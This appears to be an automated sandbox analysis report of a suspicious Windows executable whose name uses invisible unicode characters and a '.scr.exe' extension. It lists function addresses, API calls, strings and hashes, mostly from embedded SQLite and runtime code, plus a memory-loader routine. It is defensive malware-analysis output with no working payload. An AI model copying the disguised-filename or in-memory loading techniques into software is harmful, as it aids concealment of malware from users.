API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction ID: ba0812a53fb8967e5da2d4c4e5f261cff8dc96bdf625d4f7a45247eeff43f92a
Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction Fuzzy Hash: 1F018429D58206A5FB20BF60946327EE3A0EF44B06FC40079D59D466D1DF2DE644EA34

Analysis Process: #U202f#U202f#U2005#U00a0.scr.exePID: 5260, Parent PID: 1788COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.8%
Total number of Nodes:	555
Total number of Limit Nodes:	91

Executed Functions

Function 00007FF8A86F9060 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86F91AE

Strings

immutable, xrefs: 00007FF8A86F95BD
-journal, xrefs: 00007FF8A86F9407
nolock, xrefs: 00007FF8A86F9586

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: -journal$immutable$nolock
API String ID: 4149376297-4201244970
Opcode ID: 69978317b8daf74f840676876c583812051eaf0fa5d8f4842daa151fa3804642
Instruction ID: 48a9d15bd801dca7b2c01641de93c06fe9e4072f6c3892faa95054970c26805d
Opcode Fuzzy Hash: 69978317b8daf74f840676876c583812051eaf0fa5d8f4842daa151fa3804642
Instruction Fuzzy Hash: 7432BF22A0AB82A6FB619F25944837937A1FF44BD4F085234CA6E077D4DF7DE855C328

Function 00007FF8A8762BB0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 374
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8762C1F

Strings

out of memory, xrefs: 00007FF8A8762C9B
statement too long, xrefs: 00007FF8A8762DE6
database schema is locked: %s, xrefs: 00007FF8A8762D86

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 4149376297-1046679716
Opcode ID: 4c33e359c72f1d1575956bb4a2d5f390f406632b1f4cea5c10e2345e3c8caaf7
Instruction ID: f641ece3147da8672386b6dbbf72de89d39faf2a833ba16c447c1f49a9068207
Opcode Fuzzy Hash: 4c33e359c72f1d1575956bb4a2d5f390f406632b1f4cea5c10e2345e3c8caaf7
Instruction Fuzzy Hash: 36F1B132A5E6C2A6FB65CB21D4043BAA7A0FB85BC4F180135DA4D07795DF7CE984C328

Function 00007FF8A86A7B30 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A86A85F0
GetProcAddress.KERNEL32 ref: 00007FF8A86A861A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A86A86A4
VirtualProtect.KERNEL32 ref: 00007FF8A86A86C2

Memory Dump Source

Source File: 00000002.00000002.2336473513.00007FF8A86A7000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FF8A81B0000, based on PE: true

Associated: 00000002.00000002.2334248171.00007FF8A81B0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A81B1000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A81C2000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A81D2000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A81D8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A8222000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A8237000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A8247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A824E000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A825C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A8519000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A851B000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A8592000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A85EA000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A865A000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A868F000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2334291854.00007FF8A86A1000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a81b0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
Instruction ID: 2c6171d22ab5a5593a2ac98d634ea2c8d48e5b6f0387b6ad01f26fdae4f4055b
Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
Instruction Fuzzy Hash: 2262476262919296F7598F38D4042BEB7A0F7587C5F086531EA9EC37C4EB3CEA14CB14

Function 00007FF8A86F1490 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FF8A86F14B5

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
Instruction ID: 5f2b448927f59957cefc648db8c8fcda0a21052fa020cb0b51fbba93f2955d97
Opcode Fuzzy Hash: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
Instruction Fuzzy Hash: E7A11764E0FB47A1FE5A8B45A41837433A1FF59BC4F142579C98E077A0DFACE9918328

Function 00007FF8A86F0250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF8A86F048A

Part of subcall function 00007FF8A86EFC70: 00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86EFCDB
Part of subcall function 00007FF8A86EFC70: 00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86EFD63

Strings

psow, xrefs: 00007FF8A86F0801
winOpen, xrefs: 00007FF8A86F06FD
exclusive, xrefs: 00007FF8A86F041A
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A86F0566

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730$CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 3420686642-3829269058
Opcode ID: ef0112e9abf40a3b3d134f616128f0a0d28c5b40f3fddafe2bf25c5b25aad74d
Instruction ID: 970356a7b86f5e0ca1bfef56f9745d6ac42435413ddcb0b13aaf9f91274e2f20
Opcode Fuzzy Hash: ef0112e9abf40a3b3d134f616128f0a0d28c5b40f3fddafe2bf25c5b25aad74d
Instruction Fuzzy Hash: 67029021E0FB42A6FA549B21E85867973A0FF88BD4F041235DE4E426A4DF7CEC44C769

Function 00007FF8A86F9E80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A86F9EA2, 00007FF8A86F9FF8
database corruption, xrefs: 00007FF8A86F9EBB, 00007FF8A86FA011
%s at line %d of [%.10s], xrefs: 00007FF8A86F9EC2, 00007FF8A86FA018

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 0-3418467682
Opcode ID: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
Instruction ID: 26bcce2138265cbe9c161491d56417b85aa4daaece75011d834b86fb2da82935
Opcode Fuzzy Hash: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
Instruction Fuzzy Hash: A9714F61A0B642A1FA648B15E44837977A1FF84BC8F146035CE4E47695DFBDEC41C328

Function 00007FF8A86EDC50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF8A86EDD10
00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86EDDD4

Strings

winRead, xrefs: 00007FF8A86EDD68
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A86EDDA9

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 1073788972-1843600136
Opcode ID: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
Instruction ID: 05c6cfcb7abf673ba6fe4aaeebffebadca9535705b12af39abc54818127caea8
Opcode Fuzzy Hash: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
Instruction Fuzzy Hash: 30412932B09642A7FB209F19E4485A97B65FB44FC4F441132EA4D83798EF3CE445C758

Non-executed Functions

Function 00007FF8A86E77C4 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 425COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86E7CB6

Strings

VUUU, xrefs: 00007FF8A86E7A47
-, xrefs: 00007FF8A86E79C7
-Inf, xrefs: 00007FF8A86E797C
NaN, xrefs: 00007FF8A86E788C
gfff, xrefs: 00007FF8A86E7C0C
0123456789ABCDEF0123456789abcdef, xrefs: 00007FF8A86E7BBB
null, xrefs: 00007FF8A86E7893

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
API String ID: 4149376297-3207396689
Opcode ID: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
Instruction ID: a912e8cf4d9979106d1f0426e80b5b101934b5a0807b697989d9a5b56b2e0815
Opcode Fuzzy Hash: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
Instruction Fuzzy Hash: ACF15762A0E28697FF618A2895487BE7BE1EF517C4F082131DA8D476D1EF3CE845C724

Function 00007FF8A86EFC70 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 411COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86EFCDB
00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86EFD63

Part of subcall function 00007FF8A86ED380: 00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86ED3E2

Strings

winGetTempname5, xrefs: 00007FF8A86EFF3C
winGetTempname4, xrefs: 00007FF8A86F023A
winGetTempname1, xrefs: 00007FF8A86EFE64
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00007FF8A86EFF90
winGetTempname2, xrefs: 00007FF8A86EFD96
etilqs_, xrefs: 00007FF8A86EFC92, 00007FF8A86EFF4A

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 4149376297-463513059
Opcode ID: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
Instruction ID: c47d534345cd2b1b4f70afd111d2c279f85783ab4e563b7c63176220a180df7e
Opcode Fuzzy Hash: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
Instruction Fuzzy Hash: 5AE12151B1E3C667EE0D8B3924191782BA0EB497C0F14917ADA9E437D2EF3CB512C324

Function 00007FF8A870D7C0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 403COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A870D8E4

Strings

Page %u: never used, xrefs: 00007FF8A870DBC5
Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u), xrefs: 00007FF8A870DAD8
Failed to read ptrmap key=%u, xrefs: 00007FF8A870DAB1
incremental_vacuum enabled with a max rootpage of zero, xrefs: 00007FF8A870DA00
Page %u: pointer map referenced, xrefs: 00007FF8A870DC31
max rootpage (%u) disagrees with header (%u), xrefs: 00007FF8A870D9DC
Freelist: , xrefs: 00007FF8A870D95A

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
API String ID: 4149376297-741541785
Opcode ID: 5e4d16accfc88112ee46d3c2b3ae700bfc775f9f723ec424dcc118cf2f10295d
Instruction ID: abea958929e13ff4d54e22ad1efed55eb215e6586e8e5025c3e5cae09911bee9
Opcode Fuzzy Hash: 5e4d16accfc88112ee46d3c2b3ae700bfc775f9f723ec424dcc118cf2f10295d
Instruction Fuzzy Hash: 3A029D72B0A742AAE714CB25E4546AD7BB1FB887C4F150236DA4D87B98DF7CE840CB14

Function 00007FF8A8093068 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A8093084
00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A80930A8
RtlCaptureContext.KERNEL32 ref: 00007FF8A80930B1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A80930CB
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A809310C
00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A809313F
IsDebuggerPresent.KERNEL32 ref: 00007FF8A8093160
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A8093181
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A809318C

Memory Dump Source

Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true

Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3951195769-0
Opcode ID: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
Instruction ID: 007fbe656404c7dcd21b7163175a0f33d86744090ff9375f3d07da3f55fc2d9f
Opcode Fuzzy Hash: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
Instruction Fuzzy Hash: 5C314F7260AE8199EB608F61E8513ED7360FB84784F444439DA4D47B98EF38D568CB24

Function 00007FF8A875B670 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

%s.%s, xrefs: 00007FF8A875B73C
sqlite3_extension_init, xrefs: 00007FF8A875B6FA
not authorized, xrefs: 00007FF8A875B6E3
sqlite3_, xrefs: 00007FF8A875B873
error during initialization: %s, xrefs: 00007FF8A875BA36
lib, xrefs: 00007FF8A875B8C1
unable to open shared library [%.*s], xrefs: 00007FF8A875BC7F
no entry point [%s] in shared library [%s], xrefs: 00007FF8A875BB0C
_init, xrefs: 00007FF8A875B96E

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 708413d303c7417d2bb93d3eeaa82d0879c85e3b6e291b5b0e36a592e6e7edd0
Instruction ID: 71a2b9ecab8d26b3ba57ce716b67e131204bfb1f2f38e1413c171a5856362202
Opcode Fuzzy Hash: 708413d303c7417d2bb93d3eeaa82d0879c85e3b6e291b5b0e36a592e6e7edd0
Instruction Fuzzy Hash: D302A061B4BA82A1FB5A9B21E4947B973A0FF49BC0F085535DE4E06794DF3CE444C368

Function 00007FF8A8092740 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8A8092768
__scrt_initialize_crt.LIBCMT ref: 00007FF8A80927AD
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8A80927BA
_RTC_Initialize.LIBCMT ref: 00007FF8A80927E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8A809280E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8A8092839

Memory Dump Source

Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true

Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
Instruction ID: 5e14b93ba207d7ddf16c58994355414f15f9b5858816fcd617be7ca48f6ef650
Opcode Fuzzy Hash: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
